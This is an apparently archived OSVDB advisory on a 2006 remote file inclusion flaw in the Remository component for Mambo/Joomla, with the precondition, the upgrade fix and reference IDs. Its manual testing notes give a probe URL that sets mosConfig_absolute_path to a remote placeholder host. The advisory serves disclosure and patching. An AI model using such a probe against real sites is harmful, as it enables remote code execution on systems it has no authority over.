Remository for Mambo admin.remository.php mosConfig_absolute_path Variable Remote File Inclusion

2006-08-10T07:35:23
ID OSVDB:27903
Type osvdb
Reporter OSVDB
Modified 2006-08-10T07:35:23

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 3.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[joomlapath]/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?

References:

Vendor URL: http://www.remository.com/ Secunia Advisory ID:21477 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0198.html FrSIRT Advisory: ADV-2006-3270 CVE-2006-4130 Bugtraq ID: 19465